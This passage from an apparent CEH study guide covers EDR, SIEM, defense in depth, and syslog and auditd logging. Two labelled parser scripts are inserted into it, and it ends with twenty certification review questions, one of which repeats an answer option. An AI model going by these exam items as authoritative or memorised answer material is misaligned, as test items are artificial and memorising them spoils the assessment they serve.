One function they may provide is anti-malware. Not all EDR solutions will offer this sort of preventive control. An EDR that offers anti-malware may be focused not only on the signatures that would be typical for anti-malware but also on behavior-based detections. After all, the vendors of this EDR solution are aware of the same TTPs that MITRE publishes, so they can look for the TTPs that would relate to how malware may expect to install and run. They may be able to prevent malware from executing, or at least generate an alert to indicate suspicious behavior was found. EDR solutions may also detect other malicious behavior, which may be done through investigating logs that are available on the system.

However, the most common function EDR tools will perform is being able to remotely assess systems from a central console. Additionally, these tools can be used to pull back artifacts from the systems. This may include such details as process listings, memory dumps, files, or logs. Figure 3.5 shows the web interface from Google Rapid Response (GRR), which is an open source EDR tool. It is not as feature rich as some of the commercial tools available, but it is free and can be used to easily extract data from remote systems.

FIGURE 3.5 Google Rapid Response system

Having the ability to capture details quickly without having to go to the target system makes response a lot faster. However, attackers do know about these tools and may simply opt not to run if the existence of the tool is detected. They may also go into more extreme versions of evasion to make it a lot harder for the EDR to locate the attacker and their techniques. However, if you need to be able to capture a lot of details about a remote system for any sort of investigation, these tools are invaluable.

Another function EDR tools can often provide is isolation. If you happen to notice an attacker has gained access to a system, you want to keep them from being able to get to other systems within the environment. You don't want them to know that you know they are there, however. If they know you know they are there, they either may go into hiding, remaining in the environment while staying away from your prying eyes until you stop prying, or may burn everything down just to make life harder for the business. An EDR tool may be able to perform something called host isolation. While this may be able to be done within the network, especially if you have firewall controls within the network segments, it can be more efficient to just use a software control on the local system where the attacker has been seen. The attacker retains access to the system, but they are unable to get out to any other system. This may be done while the complete scope of the investigation is being completed, trying to figure out everywhere the attacker is within the environment.

Security Information and Event Management

A good practice from the standpoint of both system administration and security is system logging. Logs are helpful to diagnose problems in the system and network. They can also help in an investigation of a potential issue. Forensic investigators and incident responders will find them invaluable. If you've ever had to troubleshoot a system or application that has failed without having any logs to look at, you will understand the value of logs. However, turning up all logging to the maximum isn't the answer either. Logs consume disk space, though disk space is generally inexpensive these days. They also consume processing power, and more logging can actually make it harder to find problems because you're having to wade through enormous volumes of text to find one entry that will help you. You won't always know the text to search for, after all.

This is where a good log management system can be helpful. In the case of security incidents, these log management systems can also include search and correlation tools. While there are many log management solutions, many organizations are moving to something called security information and event management (SIEM). SIEM software, however, is not simply a log management solution. You don't just dump all your logs into it and move on. SIEM software is used to correlate and analyze security alerts. It will also provide you with the ability to better visualize your data. As an example, in Figure 3.6, you can see DNS response codes in Kibana, which is a part of the Elastic Stack (Elasticsearch, Logstash, and Kibana), formerly known as the ELK Stack.

FIGURE 3.6 Kibana interface to the Elastic Stack

The Elastic Stack is a good platform to ingest large amounts of data from multiple sources. This can include log data as well as packet data. What you see in Figure 3.6 is a listing of the DNS responses that have been seen by the systems reporting to this Elastic Stack installation. Like other SIEM products, Elastic Stack provides a lot of search capabilities. It will also provide a large number of visualization options based on the data that is being provided to it.
A security operations center (SOC) will often be built around monitoring systems, including a SIEM system that can be used to correlate data from a number of different sources. The advantage to using SIEM is being able to pull a lot of data together so you can get a broader picture of what is happening across the network. This will help you to see trends and larger attacks. Seeing an attack in isolation may get you to focus on the one attack you are looking at, rather than recognizing that there are several other systems that are also being attacked. A single system doesn't necessarily provide you with the entry point. Having data points can help to ensure that the right controls are in place to protect information assets.

Data is only a starting point, however. You still need to be able to interpret it and understand what to do with what you have. A strategy is important. This can be policies and procedures as well as a technology plan. You may also want to have a philosophy about how you are going to implement everything you have.

Being Prepared

Technology is all well and good. However, technology in and of itself is insufficient to protect a network. It's been said that the only secure computer (and, by extension, network) is one that has had all of the cables cut and, ideally, has been filled with cement and dropped to the bottom of the ocean. If you want to do anything with a computer, you are exposing yourself to the potential for that computer to become infected or compromised. Security comes from planning and preparation. To be prepared, you need to make sure you have thought through the implications of your actions, as well as how you are implementing any solutions you have in place.

Implementing security solutions requires understanding where your resources are; this is not only information assets. It is also your technology assets. Perhaps most important, it is your human assets. Technology alone won't be sufficient. You can take care of the technology aspects with a defense-in-depth approach to security design and architecture. A defense-in-breadth approach, though, requires humans.

As mentioned earlier, having logs is really important when it comes to responding to security events. While it's nice to have a SIEM solution, even if you have one, you need data to feed to it. You can get that data by making sure you are logging on your systems. Additionally, accounting information is useful to have a trail of activity.

Defense in Depth

Defense in depth is a layered approach to network design. Any time I hear the term defense in depth, I think of Minas Tirith in the Lord of the Rings books. Minas Tirith is a city with seven concentric walls. Inside the seventh wall is the Citadel. If an invader somehow manages to breach one of the walls, the people fall back into the next ring until, if necessary, they end up inside the final wall. Ideally, invaders will either give up or be defeated as they try to make it through seven enormous walls. As discovered in the book Return of the King, though, even seven walls aren't always sufficient for defense of the city.

The reason Minas Tirith comes to mind, in case it's not clear, is because it's an example of defense in depth. Using a defense-in-depth approach, you would design a layered network with multiple security gateways to control access between layers. One of the objectives of a defense-in-depth approach is to delay the attacker or adversary. The goal isn't to prevent the adversary from getting in necessarily. It's to cause delays. It's also to, ideally, create artifacts along the way. When a defense-in-depth strategy is used, as an adversary moves through the layers of the network, they leave traces. These traces can be detected by operations staff. The hope is that the detection happens, leading to shutting down the attack, before the adversary gets to any really sensitive information.

Defense in depth is a military concept that has been adapted for other uses. One of them, of course, is information security. One thing you will notice that you get from an approach like a multiwalled city is redundancy. The second wall is redundant in relation to the first. The third is redundant to the second (and by extension the first), and so on. This doesn't necessarily mean that you just keep placing the same controls back to back everywhere. A better approach is to provide redundant controls across multiple areas.

The first area of controls to consider is physical. This means ensuring that unauthorized people can't get physical access to a system. Anyone with physical access to a system has the potential to get logged into the system; as an example, there may already be a user logged in, and if the system isn't locked, anyone could become the logged-in user. The attacker may be able to boot to an external drive and change the password or create another user. There are a few ways for an attacker to get access to a system if they have physical control of it.

The second area of controls is technical. This is what I've been talking about: firewalls, intrusion detection systems, SIEMs, and other security technology. It's not just that, though. It can be software or configuration controls like password policies, requiring complex passwords. Antivirus or other endpoint protection would also be a technical control. Any hardware or software that is in place to prevent unauthorized use would be a technical control.

Finally, there are administrative controls. These are the policies, standards, and procedures. This may include policies or practices like hiring standards, background checks, and data handling policies. These administrative controls set the tone for how the organization is protected, and they are essential.

Figure 3.7 shows an example of how some elements of a defense-in-depth approach might be implemented. You can see at the entry point to the network that there is a firewall. The firewall then has two separate networks that come off it. The first is a demilitarized zone, which is where servers that are untrusted but still part of the corporate network reside. This is where you might place Internet-facing servers like web or email. The other side of the firewall is where you might put internal servers like Active Directory or file servers. This sort of network segmentation is often part of a defense-in-depth strategy. A second firewall protects the internal network from the server network and vice versa. Finally, we have intrusion detection and endpoint protection in place. What isn't shown in this diagram are the procedures and policies that are in place in the business. We not only have several tiers in the network that an attacker would have to traverse, we also have different detection and protection points. Of course, there is more to it than even just the network design, the technology, and the policies and procedures.

FIGURE 3.7 Defense-in-depth network design (diagram labels: External Firewall, DMZ, Internal Firewall, Internal Servers, Desktop Network, Intrusion Detection System, Intrusion Detection System, Desktop with Endpoint Protection)

Defense in Breadth

For several years now, there has been something of a debate between the advantages of defense in depth versus those of defense in breadth. Is defense in depth sufficient, or do organizations need to be implementing defense in breadth? Of course, the challenge to defense in breadth is that it is rarely explained very well. If you search for explanations of defense in breadth, you will find a lot of rationale for why defense in breadth is a good thing and why defense in depth in and of itself is insufficient for a modern strategy to implement security solutions within an organization. The problem is that when you can find a definition of what defense in breadth is, it's very vague.

My understanding of defense in breadth over the years has been that it's all the surround that is missing from defense in depth. Defense in depth doesn't take into account all of the human factors. Defense in breadth is meant to take a more holistic look at the organization from a risk perspective. The organization is meant to evaluate risk and take a systemic look at how to mitigate any risk, taking into account the threats that the organization expects to be exposed to. To fully evaluate risk and take a comprehensive look at potential solutions, an organization needs to have data.

One way, perhaps, to think about it is that defense in depth is really about prevention. However, prevention isn't entirely realistic. This is especially true in an era where the old technical attacks of exploiting vulnerabilities in listening services exposed to the outside
world are no longer the vectors of choice. Instead, going after the user is more productive, so social engineering attacks and a lot of malware are more common. As a result, the best approach to security is not to focus primarily on prevention but instead to assume that you will get breached at some point and prepare for response. To be prepared for a response, you need a lot of detection and historical data. Additionally, you need an incident response team whose members know what their roles are. You also need a lot of communication across different teams. The members of the security team are not always the best people to respond to events, especially since they may not always be aware of them. This means that breaking down some of the traditional silos is essential.

A growing trend in the information technology (IT) space is the collaboration between development teams and operations teams, commonly referred to as DevOps. Companies that are even more forward-thinking are also ensuring that security is merged in along the way. What you end up with is something that is often called DevSecOps. These approaches focus not only on teamwork and the associated communication that is necessary but also on automation. Automating builds, testing, and deployment takes a lot of the human factor out, helping to avoid misconfigurations or other mistakes.

You can see that defense in breadth can be a very complicated idea that may be difficult to fully implement once you start thinking about where you can inject security conversations into your organization. Ultimately, though, the goal of defense in breadth is to be better positioned not only to protect the organization but also to respond to attacks, and to respond to a breach with the goal of restoring business operations as quickly as possible.

Defensible Network Architecture

Another approach to consider when putting a network together is to use a defensible network architecture. This does not preclude either defense in depth or defense in breadth. Instead, it focuses on building your network in a way that you can more easily monitor and control. Keep in mind that one of the techniques an attacker will use is to move laterally (from system to system) within a network environment. This means once they have compromised one system, they will try to move to another system. Since it's easier to see systems on the local network, they may target those systems for a while until they get some additional information about other systems on other networks. Attackers don't generally have the big picture with regard to the entire enterprise network, unless they happen across a network diagram.

If you create a network that has firewalls at the entry/exit points of the network, a common approach used to segment the network, you have the ability to monitor all traffic going into and out of the network. You also have the ability to create a choke point, meaning if you suspect an attacker is in one network, you can restrict all access to other networks. Having these blocking and monitoring controls allows you to better keep track of, and control, what an attacker is doing, if you catch them late in the attack lifecycle and they have taken up residence to at least a small degree. You may not have blocked them from getting initial access, but you should have the ability to keep an eye on them and restrict further access while you get the complete scope of their infiltration of your environment.

Logging

One idea that has arisen in several places along the way here is logging. This is not only system logging but also application logging. Beyond that, it's not just logging on systems, desktop or server, but also on network equipment like routers and switches and certainly firewalls. Even in cases where you are running an IDS in the network, you may not always want to alert, because there may be some events that you don't feel it necessary to follow up on. However, the fact that the event happened may be useful to know about once a breach has happened. The importance of having historical data can't be overstated.

Many systems, including Unix-like systems as well as network devices, will support the syslog protocol. This is a logging protocol that began as the logging mechanism for the Simple Mail Transfer Protocol (SMTP) server sendmail. Over the years since the 1980s, when syslog was first implemented in sendmail, it has become the standard logging solution on Unix-like systems, and the protocol has been documented in RFC 3164, later standardized in RFC 5424. Syslog not only has an easy-to-understand syntax in the creation and reading of messages, it also can be used for remote logging as well as local logging. Because syslog can support remote logging, it can be used as a centralized log host. This fact is, perhaps, especially important when preparing for incident response. A common approach to wiping your tracks is to wipe logs. Any attacker who gets access to a system may be able to wipe the local logs, but if they are streaming off the system, they are retained for later use, unless the attacker can compromise the central log host.

You can see an example of syslog messages in the following code listing. Each message starts with the date, followed by the originating hostname. After that is the process that created the log, including the process identification number. Finally, the message that the process generated is shown.

syslog Messages

```
Jun 26 10:27:16 boardinghouse kernel: [923361.001444] vmbr0: port 3(tap210i0) entered forwarding state
Jun 26 10:27:17 boardinghouse pvedaemon[10864]: end task UPID:boardinghouse:000034F1:0580EE23:5B326963:qmstart:210:root@pam: OK
Jun 26 10:27:42 boardinghouse pvedaemon[9338]: starting task UPID:boardinghouse:00003552:0580F8B5:5B32697E:vncproxy:210:root@pam:
Jun 26 10:32:09 boardinghouse pvedaemon[9338]: end task UPID:boardinghouse:00003552:0580F8B5:5B32697E:vncproxy:210:root@pam: OK
```

The syslog standard defines facilities to categorize messages so they can be routed to different locations. Any messages related to authentication, for example, can be put into a single file, away from other types of messages. Each facility can be routed to a different file
or even a different system, if you wanted some log messages stored locally and others stored centrally. In some syslog implementations, you can store both locally and remotely. This provides local logs as well as remote logs that function as backups. Beyond facilities, syslog defines severity. This means applications can determine the level of an event, including informational, debug, warning, and error. Just as with facilities, severities can be redirected to different locations.

Not every system is Unix-like, of course. Windows systems are very common, on the desktop as well as the server. On Windows systems, log messages get sent to the event subsystem. Instead of the text-based messages that syslog uses, the event subsystem uses a binary storage system. Of course, one advantage of the way the event subsystem stores data is that it can be queried, as though it were a database. While it's not as easy to parse messages, the fact that you can query messages means you can easily return related messages with a single query.

The event subsystem in Windows also has a large amount of data. In addition to the different categories, such as system, security, and application, there are event IDs. An event ID can identify all entries that are the same. Searching for the event ID can give you every instance of a particular event, which may occur across multiple processes. Figure 3.8 shows a single event from the Windows Event Viewer where you can see the event ID. You can also see other pieces of information that come with each event in the Event Viewer.

FIGURE 3.8 Event Viewer
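An added example, not from the book, for the syslog discussion above: it parses lines in the RFC 3164 layout the text describes (optional <PRI>, timestamp, host, tag with optional pid, message), decodes the facility and severity from the PRI value (facility * 8 + severity), and applies selector rules in the style of syslog.conf so the same message can be seen going to a local file and to a central log host at once. The two lines without a PRI are from the listing above; the two lines carrying a PRI, the selector table, and the host name loghost.example.net are constructed for the example.

```python
"""Parse RFC 3164-style syslog lines and route them by facility and severity. Added example."""
import re
from dataclasses import dataclass
from typing import Optional

FACILITIES = {0: "kern", 1: "user", 2: "mail", 3: "daemon", 4: "auth", 5: "syslog", 6: "lpr",
              7: "news", 8: "uucp", 9: "cron", 10: "authpriv", 11: "ftp",
              **{16 + i: f"local{i}" for i in range(8)}}
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]

# <PRI>, timestamp, host, tag[pid]: message.  PRI = facility * 8 + severity.
LINE = re.compile(r"^(?:<(?P<pri>\d{1,3})>)?"
                  r"(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) "
                  r"(?P<host>\S+) (?P<tag>[^:\[\s]+)(?:\[(?P<pid>\d+)\])?: ?(?P<msg>.*)$")


@dataclass
class SyslogMessage:
    facility: str
    severity: str
    timestamp: str
    host: str
    tag: str
    pid: Optional[int]
    msg: str


def parse_syslog(line, default_pri=13):
    """Lines written to a local file usually lack <PRI>; RFC 3164 says to treat a
    missing PRI as 13 (user.notice)."""
    m = LINE.match(line)
    if not m:
        raise ValueError(f"not a syslog line: {line!r}")
    pri = int(m["pri"]) if m["pri"] else default_pri
    return SyslogMessage(FACILITIES.get(pri >> 3, f"facility{pri >> 3}"), SEVERITIES[pri & 7],
                         m["ts"], m["host"], m["tag"],
                         int(m["pid"]) if m["pid"] else None, m["msg"])


# Constructed selectors in the spirit of syslog.conf: (facility, threshold, destination).
# "*" is any facility; a threshold of "err" means err or worse, as in syslog.conf.
ROUTES = [
    ("auth", "debug", "/var/log/auth.log"),
    ("authpriv", "debug", "/var/log/auth.log"),
    ("*", "err", "@loghost.example.net"),    # anything err or worse also goes to the central host
    ("*", "debug", "/var/log/messages"),
]


def route(msg):
    """Every matching selector fires, so one message can land in several places."""
    level = SEVERITIES.index(msg.severity)
    return [dest for fac, threshold, dest in ROUTES
            if fac in ("*", msg.facility) and level <= SEVERITIES.index(threshold)]


SAMPLE = [
    # Two lines from the listing above (no PRI, as written to a local file)...
    "Jun 26 10:27:16 boardinghouse kernel: [923361.001444] vmbr0: port 3(tap210i0) entered forwarding state",
    "Jun 26 10:27:17 boardinghouse pvedaemon[10864]: end task UPID:boardinghouse:000034F1:0580EE23:5B326963:qmstart:210:root@pam: OK",
    # ...and two constructed lines carrying a PRI: 38 = auth.info, 11 = user.err.
    "<38>Jun 26 10:28:03 boardinghouse sshd[9711]: Accepted publickey for root from 192.168.86.49 port 50211 ssh2",
    "<11>Jun 26 10:29:00 boardinghouse pvedaemon[9338]: worker exit with code 1",
]


def demo():
    return [(m.facility, m.severity, m.tag, m.pid, route(m)) for m in map(parse_syslog, SAMPLE)]
```

The routing table is where the text's point about a central log host shows up: the err-or-worse selector sends a copy off the box while the catch-all keeps a local copy, so wiping /var/log/messages on the host does not remove the remote record.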
In both cases, application developers can make use of the system-provided logging functionality. On the Unix side, any developer can write to syslog and the syslog service will take care of writing the logs out based on the definition in the configuration file. This takes the onus of developing logging schemes off the developers and also ensures a single place to go for log messages. The same is true on Windows systems. Any application developer can make use of the event subsystem, using it to write log messages. The application can even have its own log file and Windows will break the logs out to separate locations. If you were to go into the Event Viewer application, you would be able to look at all the event log entries and the different categories the event logs fell into. You would typically see a list of all the applications Windows is logging for. Any application could have its own entry in that list to keep the logs separate from the system while it’s still logged to the same location as all the other logs.

Auditing

Logs are important, and we generally rely on application developers to implement logging and, ideally, configurable logging, meaning different levels of log messages. Being able to turn up logging to a verbose level can make troubleshooting problems much easier. The same is true for the operating system. This is where auditing can come in. Both Unix-like systems and Windows systems offer the ability to enable and configure auditing. Of course, the definition of auditing is different across the two systems.

On Windows systems, auditing is a security function. It relates to success or failure of system events. This can include success or failure of logins, for example, or access to files on the system. Figure 3.9 shows the settings of the audit policy within the Local Security Policy application. Each category in the policy can have success or failure logged. This isn’t an either/or, though. You can log both success and failure. If the audit events are triggered, they will show up in the security log in the Windows Event Viewer.

FIGURE 3.9 Audit Policy in Windows
On the Linux side, there is a completely different auditing infrastructure. Using the program auditctl, audit policies can be managed on a Linux system. The auditing subsystem in the Linux kernel can be used to watch files and directories for activity. It can be used to monitor application execution. Perhaps most important, it can also be used to monitor system calls. Any system call used by any program on the system can be monitored and logged. The audit subsystem typically has its own set of logs. An example of some of the log entries from audit.log on a CentOS Linux system is shown in the following code listing.

audit.log Sample Output

type=USER_LOGIN msg=audit(1530130008.763:341): pid=9711 uid=0 auid=0 ses=30 msg='op=login id=0 exe="/usr/sbin/sshd" hostname=binkley.lan addr=192.168.86.49 terminal=/dev/pts/0 res=success'
type=USER_START msg=audit(1530130008.765:342): pid=9711 uid=0 auid=0 ses=30 msg='op=login id=0 exe="/usr/sbin/sshd" hostname=binkley.lan addr=192.168.86.49 terminal=/dev/pts/0 res=success'
type=CONFIG_CHANGE msg=audit(1530130271.424:353): auid=4294967295 ses=4294967295 op=add_rule key=(null) list=4 res=1
type=SERVICE_START msg=audit(1530130271.424:354): pid=1 uid=0 auid=4294967295 ses=4294967295 msg='unit=auditd comm="systemd" exe="/usr/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'
type=SYSCALL msg=audit(1530130283.962:355): arch=c000003e syscall=59 success=yes exit=0 a0=106e000 a1=1063a90 a2=10637e0 a3=7ffec3721e70 items=2 ppid=9711 pid=9908 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=30 comm="cat" exe="/usr/bin/cat" key=(null)
type=EXECVE msg=audit(1530130283.962:355): argc=2 a0="cat" a1="audit.log"
type=CWD msg=audit(1530130283.962:355): cwd="/var/log/audit"
type=PATH msg=audit(1530130283.962:355): item=0 name="/usr/bin/cat" inode=2799 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PATH msg=audit(1530130283.962:355): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=33559249 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1530130283.962:355): proctitle=6361740061756469742E6C6F67

Each entry provides details about the type of the entry, which indicates what the audit subsystem has detected. For example, the first entry indicates that a user has logged in. You can see from the details that the address the connection came from is 192.168.86.49, that the executable is /usr/sbin/sshd, and that the result was a success. Other entries indicate file actions, program executions, and configuration changes.

Much as with the auditing under Windows, the auditing under Linux needs to be configured. You do this by creating rules that are used by the auditd daemon. You can make the changes directly in the configuration files, or you can add the rules on the command line using the auditctl command. This implements changes directly and is what gets called as the audit system is coming up. What go into the configuration file are the command-line parameters that would get passed to auditctl.

Summary

There are some essential concepts in information security that we need to get behind us. The first are the three elemental properties of information security—confidentiality, integrity, and availability. Confidentiality is the need to keep secret information secret. Integrity means ensuring that data doesn’t change when it isn’t expected to change. Finally, availability means information, including services, is available when it is expected to be available. Beyond the triad, as confidentiality, integrity, and availability are known, is the Parkerian hexad, which adds in utility, authenticity, and possession or control.

There are technology elements that are commonly implemented. One you will see almost everywhere is a firewall. Firewalls come in multiple areas of functionality, however. The most basic firewall is packet filtering, meaning decisions can be made based on packet headers. Stateful firewalls factor in the state of the connection when it comes to decisions about allowing or blocking traffic. Deep packet inspection firewalls can look at the data payload to determine whether to block messages. Finally, unified threat management devices, which some call next-generation firewalls, can take firewall functionality to a new level by also adding in antivirus. The antivirus looks at the network stream for malware rather than waiting until it gets to the endpoint. Application layer gateways are also a variation of a firewall. These are devices that are aware of the application layer protocols and can make decisions about the packets based on whether the traffic matches to allowed endpoints and whether the flow is correct based on the protocol.

Technology alone isn’t enough. A defense-in-depth strategy applies layers not only to the placement of the technology but also to the policies, procedures, and standards that are required to guide the security functions. Defense in breadth adds in a broader view to defense in depth with a lot of additional surround across the organization. This may include awareness training, detection, preparation for response, and other capabilities that are beyond just preventing attacks.

Preparing for attacks is essential in businesses today. Certainly there are incident response plans, policies, and teams. However, from a technology standpoint, logging and auditing can be very helpful when it comes time to respond. Logging may be system logging or application logging, where there is a trail of actions that have been determined by the programmer. When it comes to auditing, Windows auditing capabilities include success or failure logs for access to files, users, or other system objects. On the Linux side, audit rules can be written to watch files and directories as well as system calls.
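The audit.log records shown in the Being Prepared section are worth seeing in parsed form, because one action (the cat of audit.log) produces six records sharing a single audit(timestamp:serial) identifier, and the proctitle value is hex-encoded. The following is an added example, not code from the book or from the audit package: it parses the key=value records, including the nested msg='...' block on USER_* records, regroups them by serial, decodes proctitle, and prints a one-line summary per event. The sample records are the ones from that listing.

```python
"""Parse Linux audit.log records and reassemble auditd's multi-record events.

Added example, not code from the book or the audit package.  Only the
`proctitle` value is decoded: auditd hex-encodes it so the NUL separators
between argv entries survive."""
import re

# key=value pairs; values are bare, "double quoted" or 'single quoted' (the
# msg='...' block on USER_* records holds its own key=value pairs).
KV_RE = re.compile(r"""(\w[\w-]*)=("[^"]*"|'[^']*'|\S*)""")
AUDIT_ID_RE = re.compile(r"msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\):")


def parse_kv(text):
    """'a=1 b="x y" c=(null)' -> {'a': '1', 'b': 'x y', 'c': None}."""
    out = {}
    for key, val in KV_RE.findall(text):
        if val in ("(null)", "?"):
            out[key] = None
        elif len(val) > 1 and val[0] in "\"'" and val[-1] == val[0]:
            out[key] = val[1:-1]
        else:
            out[key] = val
    return out


def decode_proctitle(value):
    """Hex proctitle -> argv list: '6361740061756469742E6C6F67' -> ['cat', 'audit.log']."""
    return bytes.fromhex(value).decode("utf-8", "replace").split("\0")


def parse_record(line):
    """One audit.log line -> dict with type, timestamp, serial and all fields
    (nested msg='...' fields merged in).  Returns None for non-audit lines."""
    m = AUDIT_ID_RE.search(line)
    if m is None or not line.startswith("type="):
        return None
    rec = {"type": line.split(None, 1)[0][5:],
           "timestamp": float(m.group("ts")), "serial": int(m.group("serial"))}
    fields = parse_kv(line[m.end():])
    nested = fields.pop("msg", None)
    if nested:
        fields.update(parse_kv(nested))
    rec.update(fields)
    if rec["type"] == "PROCTITLE" and "proctitle=" in line:
        raw = line.split("proctitle=", 1)[1].strip()
        # auditd quotes the value when it needs no escaping; otherwise it is hex.
        rec["argv"] = [raw.strip('"')] if raw.startswith('"') else decode_proctitle(raw)
    return rec


def group_events(lines):
    """Records of one event (SYSCALL, EXECVE, CWD, PATH, PROCTITLE, ...) share a
    serial number; collect them by serial."""
    events = {}
    for line in lines:
        rec = parse_record(line)
        if rec is not None:
            events.setdefault(rec["serial"], []).append(rec)
    return events


def summarize_event(records):
    """One-line description of an event, covering the record types in the listing."""
    by_type = {r["type"]: r for r in records}
    if "USER_LOGIN" in by_type:
        r = by_type["USER_LOGIN"]
        return f"login via {r['exe']} from {r['addr']} uid={r['uid']} res={r['res']}"
    if "CONFIG_CHANGE" in by_type:
        r = by_type["CONFIG_CHANGE"]
        return f"audit rule change: op={r['op']} list={r['list']} res={r['res']}"
    if "SYSCALL" in by_type:
        r = by_type["SYSCALL"]
        argv = by_type.get("PROCTITLE", {}).get("argv", [r.get("comm")])
        cwd = by_type.get("CWD", {}).get("cwd")
        return (f"syscall {r['syscall']} by uid={r['uid']} pid={r['pid']} "
                f"exe={r['exe']} cwd={cwd} argv={argv} success={r['success']}")
    r = records[0]
    return f"{r['type']} res={r.get('res')}"


# The records from the audit.log listing in the Being Prepared section.
SAMPLE_RECORDS = [
    """type=USER_LOGIN msg=audit(1530130008.763:341): pid=9711 uid=0 auid=0 ses=30 msg='op=login id=0 exe="/usr/sbin/sshd" hostname=binkley.lan addr=192.168.86.49 terminal=/dev/pts/0 res=success'""",
    """type=USER_START msg=audit(1530130008.765:342): pid=9711 uid=0 auid=0 ses=30 msg='op=login id=0 exe="/usr/sbin/sshd" hostname=binkley.lan addr=192.168.86.49 terminal=/dev/pts/0 res=success'""",
    "type=CONFIG_CHANGE msg=audit(1530130271.424:353): auid=4294967295 ses=4294967295 op=add_rule key=(null) list=4 res=1",
    """type=SERVICE_START msg=audit(1530130271.424:354): pid=1 uid=0 auid=4294967295 ses=4294967295 msg='unit=auditd comm="systemd" exe="/usr/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'""",
    'type=SYSCALL msg=audit(1530130283.962:355): arch=c000003e syscall=59 success=yes exit=0 a0=106e000 a1=1063a90 a2=10637e0 a3=7ffec3721e70 items=2 ppid=9711 pid=9908 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=30 comm="cat" exe="/usr/bin/cat" key=(null)',
    'type=EXECVE msg=audit(1530130283.962:355): argc=2 a0="cat" a1="audit.log"',
    'type=CWD msg=audit(1530130283.962:355): cwd="/var/log/audit"',
    'type=PATH msg=audit(1530130283.962:355): item=0 name="/usr/bin/cat" inode=2799 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0',
    'type=PATH msg=audit(1530130283.962:355): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=33559249 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0',
    "type=PROCTITLE msg=audit(1530130283.962:355): proctitle=6361740061756469742E6C6F67",
]

if __name__ == "__main__":
    for serial, recs in sorted(group_events(SAMPLE_RECORDS).items()):
        print(serial, summarize_event(recs))
```

The regrouping matters in practice: a SYSCALL record alone tells you which executable ran as which user, but the arguments (EXECVE), working directory (CWD) and touched files (PATH) arrive as separate lines, and only their shared serial number ties them together.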
Review Questions

You can find the answers in the appendix.

1. To remove malware from the network before it gets to the endpoint, you would use which of the following?
A. Packet filter
B. Application layer gateway
C. Unified threat management appliance
D. Stateful firewall

2. If you were on a client engagement and discovered that you left an external hard drive with essential data on it at home, which security principle would you be violating?
A. Confidentiality
B. Integrity
C. Nonrepudiation
D. Availability

3. How would you calculate risk?
A. Probability * loss value
B. Probability * mitigation factor
C. (Loss value + mitigation factor) * (loss value / probability)
D. Probability * mitigation factor

4. Which of the following is one factor of a defense-in-depth approach to network design?
A. Switches
B. Using Linux on the desktop
C. Optical cable connections
D. Access control lists on routers

5. How would you ensure that confidentiality is implemented in an organization?
A. Watchdog processes
B. Encryption
C. Cryptographic hashes
D. Web servers

6. An intrusion detection system can perform which of the following functions?
A. Block traffic
B. Filter traffic based on headers
C. Generate alerts on traffic
D. Log system messages

7. Which of these would be an example of a loss of integrity?
A. User making changes to a file and saving it
B. Bad blocks flagged on disk
C. Credit cards passed in cleartext
D. Memory failures causing disk drivers to run incorrectly

8. What would you use a security information event manager for?
A. Aggregating and providing search for log data
B. Managing security projects
C. Escalating security events
D. Storing open source intelligence

9. Why is it important to store system logs remotely?
A. Local systems can’t handle it.
B. Bandwidth is faster than disks.
C. Attackers might delete local logs.
D. It will defend against attacks.

10. What would be necessary for a TCP conversation to be considered established by a stateful firewall?
A. Final acknowledgment message
B. Three-way handshake complete
C. Sequence numbers aligned
D. SYN message received

11. What is the purpose of a security policy?
A. To provide high-level guidance on the role of security
B. To provide specific direction to security workers
C. To increase the bottom line of a company
D. To align standards and practices

12. What additional properties does the Parkerian hexad offer over the CIA triad?
A. Confidentiality, awareness, authenticity
B. Utility, awareness, possession
C. Utility, possession, authenticity
D. Possession, control, authenticity

13. What important event can be exposed by enabling auditing?
A. System shutdown
B. Service startup
C. Package installation
D. User login

14. What can an intrusion prevention system do that an intrusion detection system can’t?
A. Generate alerts
B. Block or reject network traffic
C. Complete the three-way handshake to bogus messages
D. Log packets

15. Which of these is an example of an application layer gateway?
A. Web application firewall
B. Runtime application self-protection
C. Java applet
D. Intrusion prevention system

16. Which information would a packet filter use to make decisions about what traffic to allow into the network?
A. HTTP REQUEST message
B. Ethernet type
C. UDP source port
D. SNMP OID

17. Which of the following products might be used as an intrusion detection system?
A. Elastic Stack
B. Prewikka
C. Snort
D. Snorby

18. Which of these isn’t an example of an attack that compromises integrity?
A. Buffer overflow
B. Man in the middle
C. Heap spraying
D. Watering hole

19. What type of attack is a compromise of availability?
A. Watering hole
B. DoS
C. Phishing
D. Buffer overflow

20. What important function can EDR offer to security operations staff?
A. Host isolation
B. Malware detection
C. Remote data collection
D. All of the above

Chapter 4
Footprinting and Reconnaissance

THE FOLLOWING CEH
TOPICS ARE COVERED IN THIS CHAPTER:

✓ Technical assessment methods
✓ Port scanning
✓ Privacy and confidentiality
✓ Data analysis
✓ Vulnerability scanning

It’s commonly believed that attackers do a lot of work up front before launching attacks. They get a sense of how large the attack surface is and where their targets are. This can take a lot of work, using a lot of different tool and skill sets. The process of getting the size and scope of the target is called footprinting—in other words, the attacker, or you, the ethical hacker, is trying to pick up the footprint of the target organization. When it comes to ethical hacking, you may have some help from the target, who would have employed you for your services. They may provide you with some footholds to get a sense of the scope and scale of what you should be doing. It’s possible, though, that you are starting blind and you have to get your own footholds.

